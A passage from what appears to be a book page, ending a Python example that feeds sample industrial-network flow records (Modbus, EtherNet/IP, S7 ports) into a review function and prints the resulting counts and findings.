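# src_ip src_port dst_ip dst_port proto
10.10.1.20 51234 10.10.1.5 502 tcp
10.20.0.5 40211 10.10.1.5 44818 tcp
10.20.0.7 40212 10.10.1.5 44818 tcp
203.0.113.9 55555 10.10.2.10 102 tcp
10.10.1.20 1024 10.10.1.7 9600 udp
198.51.100.4 44444 10.10.2.11 502 tcp
10.20.0.9 3389 10.10.1.9 443 tcp
"""

if __name__ == "__main__":
    counts, found = review(SAMPLE_FLOWS.splitlines())
    print(dict(counts))
    for item in found:
        print("FINDING:", item)
```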

197 | Page